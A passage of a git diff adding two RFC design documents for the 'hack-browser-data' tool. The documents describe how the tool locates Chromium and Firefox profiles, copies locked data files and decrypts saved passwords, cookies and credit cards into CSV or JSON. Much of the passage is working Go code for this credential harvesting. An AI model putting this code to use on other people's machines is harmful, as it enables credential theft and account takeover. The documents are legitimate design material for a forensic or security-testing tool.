categories) + + data := &browserdata.BrowserData{} + var errs []error + + for _, cat := range categories { + path, ok := files[cat] + if !ok { continue } + + // c.masterKey was retrieved once in New() and stored on the struct. + switch cat { + case types.Password: + data.Passwords, err = c.extractPasswords(c.masterKey, path) + case types.Cookie: + data.Cookies, err = c.extractCookies(c.masterKey, path) + case types.History: + data.Histories, err = c.extractHistories(path) + case types.Download: + data.Downloads, err = c.extractDownloads(path) + case types.Bookmark: + data.Bookmarks, err = c.extractBookmarks(path) + case types.CreditCard: + data.CreditCards, err = c.extractCreditCards(c.masterKey, path) + case types.Extension: + data.Extensions, err = c.extractExtensions(path) + case types.LocalStorage: + data.LocalStorage, err = c.extractLocalStorage(path) + case types.SessionStorage: + data.SessionStorage, err = c.extractSessionStorage(path) + } + if err != nil { + log.Debugf("extract %s: %v", cat, err) + errs = append(errs, fmt.Errorf("%s: %w", cat, err)) + } + } + return data, errors.Join(errs...) // Go 1.20 +} +``` + +### 6.2 Error severity levels + +| Level | Behavior | Example | +|-------|----------|---------| +| Session/key failure | `return nil, err` — abort entirely | Disk full, keychain denied | +| Category failure | Log, skip, continue next category | Cookie file locked | +| Single record failure | Skip record, continue extraction | One cookie decryption failed | + +### 6.3 Error wrapping convention + +Use `fmt.Errorf` with `%w` for error context. No custom error types needed. + +```go +// Good: wraps with context +raw, err := base64.StdEncoding.DecodeString(encoded) +if err != nil { return nil, fmt.Errorf("base64 decode: %w", err) } + +// Bad: swallows error +raw, _ := base64.StdEncoding.DecodeString(encoded) +``` + +The `%w` verb preserves the error chain for `errors.Is()` and `errors.As()` if needed later. + +### 6.4 Caller pattern + +```go +data, err := b.Extract(categories) +if err != nil { + log.Warnf("%s: %v", b.Name(), err) // partial failure +} +if data == nil { + continue // total failure +} +data.Output(dir, b.Name(), format) // output whatever succeeded +``` + +--- + +## 7. Implementation Order + +| Phase | Scope | Risk | +|-------|-------|------| +| 1 | `types/category.go` + `types/models.go` + `browserdata/browserdata.go` | Zero — new files only | +| 2 | `browserdata/datautil/sqlite.go` + `decrypt.go` | Zero — new files only | +| 3 | `crypto/version.go`, rename `AESCBCDecrypt` | Low — internal crypto changes | +| 4 | `crypto/keyretriever/` | Low — new package | +| 5 | `browser/chromium/source.go` + `extract_*.go` | Medium — new extract methods | +| 6 | `browser/firefox/source.go` + `extract_*.go` | Medium — new extract methods | +| 7 | `filemanager/session.go` | Low — new package | +| 8 | Wire `Extract()` + `Config` + `PickBrowsers()` | High — connects everything | +| 9 | Delete old code: `extractor/`, `browserdata/*/`, `imports.go` | High — removal | +| 10 | Update CLI, tests, cross-platform build verification | Medium | + +--- + +## 8. Relationship with RFC-002 + +| Area | RFC-001 (this doc) | RFC-002 | +|------|-------------------|---------| +| Data model (Category + *Entry) | defines | uses | +| BrowserData container | defines | implements Output | +| Cipher version | covered | — | +| Master key retrieval | covered | — | +| Browser registration | covered | — | +| Yandex variant | covered | — | +| Error handling pattern | covered | — | +| Extract() orchestration | covered | — | +| File source mapping | — | covered | +| File acquisition (Session) | — | covered | +| Extract method details | — | covered | +| datautil helpers | — | covered | +| Output implementation | — | covered | + +--- + +## 9. Open Questions + +1. **App-Bound Encryption (Chrome 127+ v20)**: `crypto/version.go` has the extension point. Implementation deferred until tested. +2. **Firefox version detection**: is the key-length heuristic in `processMasterKey()` sufficient, or formalize it? +3. **Sort direction**: standardize all categories to DESC by date? (Firefox history/download currently ASC) + +--- + +## References + +- [Chromium OS Crypt](https://source.chromium.org/chromium/chromium/src/+/main:components/os_crypt/) +- [Chrome Password Decryption](https://github.com/chromium/chromium/blob/main/components/os_crypt/sync/os_crypt_win.cc) +- [Firefox NSS](https://developer.mozilla.org/en-US/docs/Mozilla/Projects/NSS) diff --git a/rfcs/002-browserdata-and-file-acquisition-refactoring.md b/rfcs/002-browserdata-and-file-acquisition-refactoring.md new file mode 100644 index 0000000..0c269d9 --- /dev/null +++ b/rfcs/002-browserdata-and-file-acquisition-refactoring.md @@ -0,0 +1,843 @@ +# RFC-002: Data Extraction & File Acquisition + +**Author**: moonD4rk +**Status**: Proposed +**Created**: 2026-03-14 +**Updated**: 2026-03-22 + +## Abstract + +This RFC covers the implementation details of data extraction and file acquisition: + +1. **File source mapping**: how each browser engine maps categories to files +2. **File acquisition**: Session-based temp file management with deduplication +3. **Extract methods**: concrete implementations for each data category +4. **Shared helpers**: `QuerySQLite()` and `DecryptChromiumValue()` +5. **Output**: writing `Extract` results to CSV/JSON files + +**Constraint**: Go 1.20 (Windows 7 support). + +See RFC-001 for data model (`Category` + `*Entry` types), crypto layer, browser registration, and Yandex variant design. + +--- + +## 1. Data Flow + +``` +CLI: main.go + │ + ▼ +browser.PickBrowsers("all", "") + │ + │ platformBrowsers() → []Config + │ → chromium.New(cfg, dir) / firefox.New(dir) + ▼ +Browser.Extract(categories) + │ + ├─ filemanager.NewSession() + │ └─ acquireFiles() with dedup → map[Category]tempPath + │ + ├─ masterKey + │ Chromium: keyretriever.RetrieveKey(storage) + │ Firefox: deriveMasterKey(key4dbPath) + │ + └─ per-category extract methods + ├─ c.extractPasswords(masterKey, path) → []LoginEntry + ├─ c.extractCookies(masterKey, path) → []CookieEntry + ├─ c.extractHistories(path) → []HistoryEntry + ├─ c.extractDownloads(path) → []DownloadEntry + ├─ c.extractBookmarks(path) → []BookmarkEntry + ├─ c.extractCreditCards(masterKey, path) → []CreditCardEntry + ├─ c.extractExtensions(path) → []ExtensionEntry + ├─ c.extractLocalStorage(path) → []StorageEntry (LevelDB) + └─ c.extractSessionStorage(path) → []StorageEntry (LevelDB) + │ + ▼ + browserdata.BrowserData{Passwords: [...], Cookies: [...], ...} + │ + ▼ + BrowserData.Output(dir, name, format) + │ + ▼ + chrome_default_password.csv + chrome_default_cookie.json + ... +``` + +--- + +## 2. File Source Mapping + +### 2.1 Category → source (one flat map per engine) + +```go +// browser/chromium/source.go + +type source struct { + paths []string // candidates in priority order + isDir bool +} + +var chromiumSources = map[types.Category]source{ + types.Password: {paths: []string{"Login Data"}}, + types.Cookie: {paths: []string{"Network/Cookies", "Cookies"}}, + types.History: {paths: []string{"History"}}, + types.Download: {paths: []string{"History"}}, // same file, different query + types.Bookmark: {paths: []string{"Bookmarks"}}, + types.CreditCard: {paths: []string{"Web Data"}}, + types.Extension: {paths: []string{"Secure Preferences"}}, + types.LocalStorage: {paths: []string{"Local Storage/leveldb"}, isDir: true}, + types.SessionStorage: {paths: []string{"Session Storage"}, isDir: true}, +} +``` + +```go +// browser/firefox/source.go + +var firefoxSources = map[types.Category]source{ + types.Password: {paths: []string{"logins.json"}}, + types.Cookie: {paths: []string{"cookies.sqlite"}}, + types.History: {paths: []string{"places.sqlite"}}, + types.Download: {paths: []string{"places.sqlite"}}, // same file + types.Bookmark: {paths: []string{"places.sqlite"}}, // same file + types.Extension: {paths: []string{"extensions.json"}}, + types.LocalStorage: {paths: []string{"webappsstore.sqlite"}}, +} +``` + +Yandex source map defined in RFC-001 Section 5. + +### 2.2 File acquisition with deduplication + +When multiple categories map to the same file (e.g. History + Download), the file is copied once: + +```go +func (c *Chromium) acquireFiles(session *filemanager.Session, categories []types.Category) map[types.Category]string { + result := make(map[types.Category]string) + copied := make(map[string]string) // abs src → temp dst + + for _, cat := range categories { + src, ok := c.sources[cat] // uses c.sources (chromiumSources or yandexSources) + if !ok { continue } + + for _, rel := range src.paths { + abs := filepath.Join(c.profileDir, rel) + + if dst, ok := copied[abs]; ok { + result[cat] = dst // reuse already-copied file + break + } + + dst := filepath.Join(session.TempDir(), filepath.Base(rel)) + if err := session.Acquire(abs, dst, src.isDir); err == nil { + copied[abs] = dst + result[cat] = dst + break + } + } + } + return result +} +``` + +### 2.3 Firefox key4.db: infrastructure, not a Category + +Each Firefox profile has its own `key4.db`. The master key is derived once in `New()` and stored on the struct, so `Extract()` never re-derives it: + +```go +// firefox.New() — called once per profile +func New(profileDir string) (*Firefox, error) { + // derive master key from this profile's key4.db + keyPath := filepath.Join(profileDir, "key4.db") + masterKey, err := deriveMasterKey(keyPath) + if err != nil { return nil, err } + + return &Firefox{ + profileDir: profileDir, + masterKey: masterKey, + sources: firefoxSources, + }, nil +} + +func (f *Firefox) Extract(categories []types.Category) (*browserdata.BrowserData, error) { + session, _ := filemanager.NewSession() + defer session.Cleanup() + + files := f.acquireFiles(session, categories) + + // masterKey was derived in New() from this profile's key4.db + data := &browserdata.BrowserData{} + // ... extract each category using f.masterKey ... +} +``` + +### 2.4 Profile Discovery + +Profile discovery functions are pure helpers (no struct receiver) that scan the filesystem: + +```go +// profile/finder.go + +// discoverProfiles returns sub-directory names that look like Chrome profiles. +// Matches "Default" or any name starting with "Profile ". +// Falls back to ["."] for Opera-style layouts (data files live directly in userDataDir). +func discoverProfiles(userDataDir string) []string { + entries, err := os.ReadDir(userDataDir) + if err != nil { return []string{"."} } + + var profiles []string + for _, e := range entries { + if !e.IsDir() { continue } + name := e.Name() + if name == "Default" || strings.HasPrefix(name, "Profile ") { + profiles = append(profiles, name) + } + } + if len(profiles) == 0 { + return []string{"."} + } + return profiles +} + +// discoverDataFiles checks which categories have actual data files in profileDir. +func discoverDataFiles(profileDir string, sources map[types.Category]source) map[types.Category]string { + found := make(map[types.Category]string) + for cat, src := range sources { + for _, rel := range src.paths { + abs := filepath.Join(profileDir, rel) + info, err := os.Stat(abs) + if err != nil { continue } + if src.isDir && !info.IsDir() { continue } + if !src.isDir && info.IsDir() { continue } + found[cat] = abs + break + } + } + return found +} + +// isValidBrowserDir checks whether the directory belongs to a real browser install. +// Chromium: requires "Local State" file. Firefox: requires directory existence. +func isValidBrowserDir(dir string, kind BrowserKind) bool { + switch kind { + case KindChromium, KindChromiumYandex: + _, err := os.Stat(filepath.Join(dir, "Local State")) + return err == nil + case KindFirefox: + info, err := os.Stat(dir) + return err == nil && info.IsDir() + } + return false +} +``` + +**Testing approach**: all three functions are pure filesystem operations, easily testable with `t.TempDir()`: + +```go +func TestDiscoverProfiles(t *testing.T) { + dir := t.TempDir() + os.MkdirAll(filepath.Join(dir, "Default"), 0o755) + os.MkdirAll(filepath.Join(dir, "Profile 1"), 0o755) + os.MkdirAll(filepath.Join(dir, "System Profile"), 0o755) + + profiles := discoverProfiles(dir) + assert.Equal(t, []string{"Default", "Profile 1"}, profiles) +} + +func TestDiscoverDataFiles(t *testing.T) { + dir := t.TempDir() + os.WriteFile(filepath.Join(dir, "Login Data"), []byte{}, 0o644) + os.MkdirAll(filepath.Join(dir, "Network"), 0o755) + os.WriteFile(filepath.Join(dir, "Network", "Cookies"), []byte{}, 0o644) + + files := discoverDataFiles(dir, chromiumSources) + assert.Contains(t, files, types.Password) + assert.Contains(t, files, types.Cookie) +} + +func TestAcquireFiles_Dedup(t *testing.T) { + dir := t.TempDir() + os.WriteFile(filepath.Join(dir, "History"), []byte("data"), 0o644) + + session, _ := filemanager.NewSession() + defer session.Cleanup() + + c := &Chromium{profileDir: dir, sources: chromiumSources} + files := c.acquireFiles(session, []types.Category{types.History, types.Download}) + assert.Equal(t, files[types.History], files[types.Download]) +} +``` + +### 2.5 Platform Config Example + +Each platform file returns the full list of known browsers with their `UserDataDir` paths: + +```go +// browser/browser_windows.go +func platformBrowsers() []Config { + return []Config{ + {Key: "chrome", Name: "Chrome", Kind: KindChromium, UserDataDir: homeDir + "/AppData/Local/Google/Chrome/User Data"}, + {Key: "edge", Name: "Microsoft Edge", Kind: KindChromium, UserDataDir: homeDir + "/AppData/Local/Microsoft/Edge/User Data"}, + {Key: "opera", Name: "Opera", Kind: KindChromium, UserDataDir: homeDir + "/AppData/Roaming/Opera Software/Opera Stable"}, + {Key: "yandex", Name: "Yandex", Kind: KindChromiumYandex, UserDataDir: homeDir + "/AppData/Local/Yandex/YandexBrowser/User Data"}, + {Key: "firefox", Name: "Firefox", Kind: KindFirefox, UserDataDir: homeDir + "/AppData/Roaming/Mozilla/Firefox/Profiles"}, + } +} +``` + +`PickBrowsers()` iterates this list, calls `isValidBrowserDir()` to skip browsers that aren't installed, then calls `discoverProfiles()` to find all profiles within valid browser directories. + +--- + +## 3. Shared Helpers: `browserdata/datautil/` + +### 3.1 SQLite query helper + +```go +// browserdata/datautil/sqlite.go + +func QuerySQLite(dbPath string, journalOff bool, query string, scanFn func(*sql.Rows) error) error { + db, err := sql.Open("sqlite", dbPath) + if err != nil { return err } + defer db.Close() + + if journalOff { + if _, err := db.Exec("PRAGMA journal_mode=off"); err != nil { return err } + } + + rows, err := db.Query(query) + if err != nil { return err } + defer rows.Close() + + for rows.Next() { + if err := scanFn(rows); err != nil { + log.Debugf("scan row error: %v", err) + continue // skip bad row, continue extraction + } + } + return rows.Err() +} +``` + +### 3.2 Generic query helper — `datautil/query.go` + +```go +package datautil + +// queryRows is a generic helper (Go 1.20) that wraps QuerySQLite +// and collects results into a typed slice. Each extract method +// only needs to provide the scan function. +func QueryRows[T any](path string, journalOff bool, query string, scanRow func(*sql.Rows) (T, error)) ([]T, error) { + var items []T + err := QuerySQLite(path, journalOff, query, func(rows *sql.Rows) error { + item, err := scanRow(rows) + if err != nil { return nil } // skip bad row + items = append(items, item) + return nil + }) + return items, err +} +``` + +### 3.3 Chromium decrypt helper + +```go +// browserdata/datautil/decrypt.go + +func DecryptChromiumValue(masterKey, encrypted []byte) ([]byte, error) { + if len(encrypted) == 0 { return nil, nil } + if len(masterKey) == 0 { + return crypto.DecryptWithDPAPI(encrypted) + } + value, err := crypto.DecryptWithDPAPI(encrypted) + if err != nil { + value, err = crypto.DecryptWithChromium(masterKey, encrypted) + } + return value, err +} +``` + +--- + +## 4. Extract Method Examples + +Each extract method lives in its own `extract_*.go` file inside the browser engine package (see RFC-001 for naming convention). The default SQL query is a `const` in the same file. Override is checked via `c.queryOverrides`. + +### 4.1 Chromium password (SQLite + decryption) + +```go +// browser/chromium/extract_password.go + +const defaultLoginQuery = `SELECT origin_url, username_value, password_value, date_created FROM logins` + +func (c *Chromium) extractPasswords(masterKey []byte, path string) ([]types.LoginEntry, error) { + logins, err := datautil.QueryRows(path, false, c.query(types.Password), + func(rows *sql.Rows) (types.LoginEntry, error) { + var url, username string + var pwd []byte + var created int64 + if err := rows.Scan(&url, &username, &pwd, &created); err != nil { + return types.LoginEntry{}, err + } + password, _ := datautil.DecryptChromiumValue(masterKey, pwd) + return types.LoginEntry{ + URL: url, + Username: username, + Password: string(password), + CreatedAt: typeutil.TimeEpoch(created), + }, nil + }) + if err != nil { return nil, err } + + sort.Slice(logins, func(i, j int) bool { + return logins[i].CreatedAt.After(logins[j].CreatedAt) + }) + return logins, nil +} +``` + +### 4.2 Chromium cookie (SQLite + decryption) + +```go +// browser/chromium/extract_cookie.go + +const defaultCookieQuery = `SELECT name, encrypted_value, host_key, path, + creation_utc, expires_utc, is_secure, is_httponly, + has_expires, is_persistent FROM cookies` + +func (c *Chromium) extractCookies(masterKey []byte, path string) ([]types.CookieEntry, error) { + cookies, err := datautil.QueryRows(path, false, c.query(types.Cookie), + func(rows *sql.Rows) (types.CookieEntry, error) { + var ( + name, host, path string + isSecure, isHTTPOnly, hasExpire, isPersistent int + createdAt, expireAt int64 + encryptedValue []byte + ) + if err := rows.Scan(&name, &encryptedValue, &host, &path, + &createdAt, &expireAt, &isSecure, &isHTTPOnly, + &hasExpire, &isPersistent); err != nil { + return types.CookieEntry{}, err + } + + value, _ := datautil.DecryptChromiumValue(masterKey, encryptedValue) + return types.CookieEntry{ + Name: name, + Host: host, + Path: path, + Value: string(value), + IsSecure: isSecure != 0, + IsHTTPOnly: isHTTPOnly != 0, + ExpireAt: typeutil.TimeEpoch(expireAt), + CreatedAt: typeutil.TimeEpoch(createdAt), + }, nil + }) + if err != nil { return nil, err } + + sort.Slice(cookies, func(i, j int) bool { + return cookies[i].CreatedAt.After(cookies[j].CreatedAt) + }) + return cookies, nil +} +``` + +### 4.3 Firefox password (JSON + `decryptPBE()` helper) + +Firefox uses `decryptPBE()` to combine the 3-step pipeline (base64 decode -> ASN1 PBE parse -> decrypt) into one call, reducing 6 error checks to 2. + +```go +// browser/firefox/extract_password.go + +// decryptPBE combines base64 decode + ASN1 PBE parse + decrypt. +func decryptPBE(encoded string, masterKey []byte) ([]byte, error) { + raw, err := base64.StdEncoding.DecodeString(encoded) + if err != nil { return nil, fmt.Errorf("base64 decode: %w", err) } + pbe, err := crypto.NewASN1PBE(raw) + if err != nil { return nil, fmt.Errorf("parse asn1 pbe: %w", err) } + plaintext, err := pbe.Decrypt(masterKey) + if err != nil { return nil, fmt.Errorf("decrypt: %w", err) } + return plaintext, nil +} + +func (f *Firefox) extractPasswords(masterKey []byte, path string) ([]types.LoginEntry, error) { + data, err := os.ReadFile(path) + if err != nil { return nil, err } + + var logins []types.LoginEntry + for _, v := range gjson.GetBytes(data, "logins").Array() { + user, err := decryptPBE(v.Get("encryptedUsername").String(), masterKey) + if err != nil { + log.Debugf("decrypt username: %v", err) + continue + } + pwd, err := decryptPBE(v.Get("encryptedPassword").String(), masterKey) + if err != nil { + log.Debugf("decrypt password: %v", err) + continue + } + + url := v.Get("formSubmitURL").String() + if url == "" { url = v.Get("hostname").String() } + + logins = append(logins, types.LoginEntry{ + URL: url, + Username: string(user), + Password: string(pwd), + CreatedAt: typeutil.TimeStamp(v.Get("timeCreated").Int() / 1000), + }) + } + + sort.Slice(logins, func(i, j int) bool { + return logins[i].CreatedAt.After(logins[j].CreatedAt) + }) + return logins, nil +} +``` + +### 4.4 Firefox cookie (SQLite, no encryption) + +```go +// browser/firefox/extract_cookie.go + +const firefoxCookieQuery = `SELECT name, value, host, path, + creationTime, expiry, isSecure, isHttpOnly FROM moz_cookies` + +func (f *Firefox) extractCookies(path string) ([]types.CookieEntry, error) { + cookies, err := datautil.QueryRows(path, true, firefoxCookieQuery, + func(rows *sql.Rows) (types.CookieEntry, error) { + var ( + name, value, host, path string + isSecure, isHTTPOnly int + createdAt, expiry int64 + ) + if err := rows.Scan(&name, &value, &host, &path, + &createdAt, &expiry, &isSecure, &isHTTPOnly); err != nil { + return types.CookieEntry{}, err + } + return types.CookieEntry{ + Name: name, + Host: host, + Path: path, + Value: value, // not encrypted + IsSecure: isSecure != 0, + IsHTTPOnly: isHTTPOnly != 0, + ExpireAt: typeutil.TimeStamp(expiry), + CreatedAt: typeutil.TimeStamp(createdAt / 1000000), + }, nil + }) + if err != nil { return nil, err } + + sort.Slice(cookies, func(i, j int) bool { + return cookies[i].CreatedAt.After(cookies[j].CreatedAt) + }) + return cookies, nil +} +``` + +### 4.5 Chromium local storage (LevelDB) + +```go +// browser/chromium/extract_storage.go + +func (c *Chromium) extractLocalStorage(path string) ([]types.StorageEntry, error) { + db, err := leveldb.OpenFile(path, nil) + if err != nil { return nil, err } + defer db.Close() + + var entries []types.StorageEntry + iter := db.NewIterator(nil, nil) + defer iter.Release() + + for iter.Next() { + url, name := parseStorageKey(iter.Key(), []byte{0}) // \x00 separator + if url == "" { continue } + entries = append(entries, types.StorageEntry{ + URL: url, + Key: name, + Value: string(iter.Value()), + }) + } + return entries, iter.Error() +} + +func (c *Chromium) extractSessionStorage(path string) ([]types.StorageEntry, error) { + db, err := leveldb.OpenFile(path, nil) + if err != nil { return nil, err } + defer db.Close() + + var entries []types.StorageEntry + iter := db.NewIterator(nil, nil) + defer iter.Release() + + for iter.Next() { + url, name := parseStorageKey(iter.Key(), []byte("-")) // "-" separator + if url == "" { continue } + entries = append(entries, types.StorageEntry{ + URL: url, + Key: name, + Value: string(iter.Value()), + }) + } + return entries, iter.Error() +} + +func parseStorageKey(key []byte, separator []byte) (url, name string) { + parts := bytes.SplitN(key, separator, 2) + if len(parts) != 2 { return "", "" } + return string(parts[0]), string(parts[1]) +} +``` + +### 4.6 Key differences between engines + +| Aspect | Chromium | Firefox | +|--------|----------|---------| +| Password source | SQLite (`Login Data`) | JSON (`logins.json`) | +| Password decryption | DPAPI → AES-GCM/CBC | ASN1PBE | +| Cookie encryption | Yes (masterKey needed) | No (plaintext) | +| Cookie journal_mode | Not needed | `PRAGMA journal_mode=off` | +| Time format | WebKit epoch (`TimeEpoch`) | Unix microseconds (`TimeStamp / 1e6`) | +| Storage format | LevelDB directory | SQLite (`webappsstore.sqlite`) | +| key4.db | Not used | Required for master key derivation | +| masterKey parameter | Passed to password, cookie, creditcard | Passed to password only | + +### 4.7 Error handling in extract methods + +Three-level rule: + +| Level | Action | Example | +|-------|--------|---------| +| File/DB open failure | `return nil, err` | `os.ReadFile` fails, `sql.Open` fails | +| Single record failure | `log.Debugf` + `continue` | One password decryption failed | +| Entire Category failure | Collected into `errs` by caller | Cookie file locked | + +Extract methods only `return error` for file-level failures. Record-level failures are logged at Debug level and skipped. The caller (`Extract()`) collects per-category errors with `errors.Join`. + +Error wrapping uses `fmt.Errorf("context: %w", err)` — no custom error types. + +--- + +## 5. File Acquisition Layer + +### 5.1 Session manager + +```go +// filemanager/session.go + +type Session struct { + tempDir string +} + +func NewSession() (*Session, error) { + dir, err := os.MkdirTemp("", "hbd-*") + if err != nil { return nil, err } + return &Session{tempDir: dir}, nil +} + +func (s *Session) TempDir() string { return s.tempDir } + +func (s *Session) Acquire(src, dst string, isDir bool) error { + if isDir { + return fileutil.CopyDir(src, dst, "lock") + } + // Try normal copy first + err := fileutil.CopyFile(src, dst) + if err != nil { + // Normal copy failed (file may be locked), try platform-specific method + if err2 := copyLocked(src, dst); err2 != nil { + return fmt.Errorf("copy %s: %w; locked copy: %v", src, err, err2) + } + } + // Copy SQLite WAL/SHM companion files if present + for _, suffix := range []string{"-wal", "-shm"} { + if fileutil.IsFileExists(src + suffix) { + _ = fileutil.CopyFile(src+suffix, dst+suffix) + } + } + return nil +} + +func (s *Session) Cleanup() { + os.RemoveAll(s.tempDir) +} +``` + +### 5.2 Locked file handling (Windows) + +On Windows, Chrome locks Cookie files while running. `Session.Acquire()` falls back to `copyLocked()` which uses `syscall.CreateFile` with `FILE_SHARE_READ|FILE_SHARE_WRITE|FILE_SHARE_DELETE` flags to bypass exclusive locks. + +Platform-specific files: +- `filemanager/copy_windows.go` — `copyLocked()` with sharing flags +- `filemanager/copy_other.go` — stub returning error + +This is transparent to callers — browser extract methods never know whether a file was copied normally or via the locked-file path. + +### 5.3 Acquirer interface (deferred) + +If only `CopyAcquirer` is needed, `Session.Acquire()` handles it directly. The `Acquirer` interface can be introduced later when VSS or other strategies are needed. + +--- + +## 6. Output + +```go +// browserdata/output.go + +func (d *BrowserData) Output(dir, browserName, format string) error { + items := []struct { + name string + data interface{} + len int + }{ + {"password", d.Passwords, len(d.Passwords)}, + {"cookie", d.Cookies, len(d.Cookies)}, + {"bookmark", d.Bookmarks, len(d.Bookmarks)}, + {"history", d.Histories, len(d.Histories)}, + {"download", d.Downloads, len(d.Downloads)}, + {"creditcard", d.CreditCards, len(d.CreditCards)}, + {"extension", d.Extensions, len(d.Extensions)}, + {"localstorage", d.LocalStorage, len(d.LocalStorage)}, + {"sessionstorage", d.SessionStorage, len(d.SessionStorage)}, + } + + var errs []error + for _, item := range items { + if item.len == 0 { continue } + filename := formatFilename(browserName, item.name, format) + if err := writeFile(dir, filename, format, item.data); err != nil { + errs = append(errs, fmt.Errorf("write %s: %w", filename, err)) + continue + } + log.Infof("exported: %s (%d items)", filename, item.len) + } + return errors.Join(errs...) +} + +func writeFile(dir, filename, format string, data interface{}) error { + if dir != "" { + if err := os.MkdirAll(dir, 0o750); err != nil { return err } + } + path := filepath.Join(dir, filename) + f, err := os.OpenFile(path, os.O_CREATE|os.O_TRUNC|os.O_WRONLY, 0o600) + if err != nil { return err } + defer f.Close() + + switch format { + case "json": + return writeJSON(f, data) + default: + return writeCSV(f, data) + } +} + +func writeJSON(w io.Writer, data interface{}) error { + enc := json.NewEncoder(w) + enc.SetIndent("", " ") + enc.SetEscapeHTML(false) + return enc.Encode(data) +} + +func writeCSV(w io.Writer, data interface{}) error { + // UTF-8 BOM (3 bytes) — replaces golang.org/x/text dependency + w.Write([]byte{0xEF, 0xBB, 0xBF}) + csvWriter := csv.NewWriter(w) + return gocsv.MarshalCSV(data, gocsv.NewSafeCSVWriter(csvWriter)) +} + +func formatFilename(browserName, dataName, format string) string { + r := strings.NewReplacer(" ", "_", ".", "_", "-", "_") + ext := "csv" + if format == "json" { ext = "json" } + return strings.ToLower(fmt.Sprintf("%s_%s.%s", r.Replace(browserName), dataName, ext)) +} +``` + +--- + +## 7. What Was Eliminated + +| Before | After | Why | +|--------|-------|-----| +| `extractor/` package (interface + registry + factory) | Deleted | Browser engines have typed extract methods | +| `browserdata/password/`, `cookie/`, etc. (9 sub-packages) | Deleted | Extract logic moved into `browser/chromium/` and `browser/firefox/` | +| `browserdata/imports.go` | Deleted | No init() registration needed | +| `types.DataType` (22 iota constants) | `types.Category` (9 constants) | No browser prefix, no key types | +| `itemFileNames` map | `chromiumSources` / `firefoxSources` per engine | File layout is engine-internal | +| `TempFilename()` on DataType | `Session.TempDir()` + `filepath.Base()` | Session manages temp paths | +| `DefaultChromiumTypes`, `DefaultFirefoxTypes`, `DefaultYandexTypes` | `types.AllCategories` | One list for all engines | +| `loginData.encryptPass`, `cookie.encryptValue` | Local variables in extract methods | Encrypted fields don't belong in data models | +| 20 trivial `Name()` / `Len()` methods | Not needed | No Extractor interface | + +--- + +## 8. Implementation Plan + +### Phase 1: Foundation (new files only, zero risk) + +1. `types/category.go` — Category enum +2. `types/models.go` — all *Entry structs +3. `browserdata/browserdata.go` — BrowserData struct +4. `browserdata/datautil/sqlite.go` — QuerySQLite() +5. `browserdata/datautil/decrypt.go` — DecryptChromiumValue() +6. `filemanager/session.go` — Session + +### Phase 2: Extract methods (new files, coexist with old code) + +1. `browser/chromium/source.go` — chromiumSources, yandexSources +2. `browser/chromium/extract_*.go` — all 9 extract methods +3. `browser/firefox/source.go` — firefoxSources +4. `browser/firefox/extract_*.go` — all extract methods + +### Phase 3: Wiring (modify existing files) + +1. Update `Chromium.Extract()` to use new extract methods +2. Update `Firefox.Extract()` to use new extract methods +3. Update `Config` and `PickBrowsers()` +4. Update `browserdata/output.go` +5. Update CLI `main.go` + +### Phase 4: Cleanup (delete old code) + +1. Delete `extractor/` package +2. Delete `browserdata/imports.go` +3. Delete `browserdata/password/`, `cookie/`, etc. +4. Delete old `types.DataType`, `itemFileNames` +5. Delete `browser/consts.go` + +### Phase 5: Verification + +```bash +go test ./... +go vet ./... +gofmt -d . +GOOS=windows GOARCH=amd64 go build ./cmd/hack-browser-data/ +GOOS=linux GOARCH=amd64 go build ./cmd/hack-browser-data/ +GOOS=darwin GOARCH=amd64 go build ./cmd/hack-browser-data/ +``` + +--- + +## 9. Open Questions + +1. **Sort direction**: standardize all categories to DESC by date? +2. **Output format**: keep `gocsv` or switch to `encoding/csv`? +3. **LevelDB key parsing**: the current `fillKey`/`fillHeader`/`fillValue` logic in localstorage is complex — how much of that detail carries over? + +--- + +## 10. Relationship with RFC-001 + +| Area | RFC-001 | RFC-002 (this doc) | +|------|---------|-------------------| +| Data model (Category + *Entry) | defines | uses | +| BrowserData container | defines | implements Output | +| Cipher version | covered | — | +| Master key retrieval | covered | — | +| Browser registration | covered | — | +| Yandex variant | covered | — | +| Error handling pattern | covered | — | +| File source mapping | — | covered | +| File acquisition | — | covered | +| Extract methods | — | covered | +| datautil helpers | — | covered | +| Output | — | covered |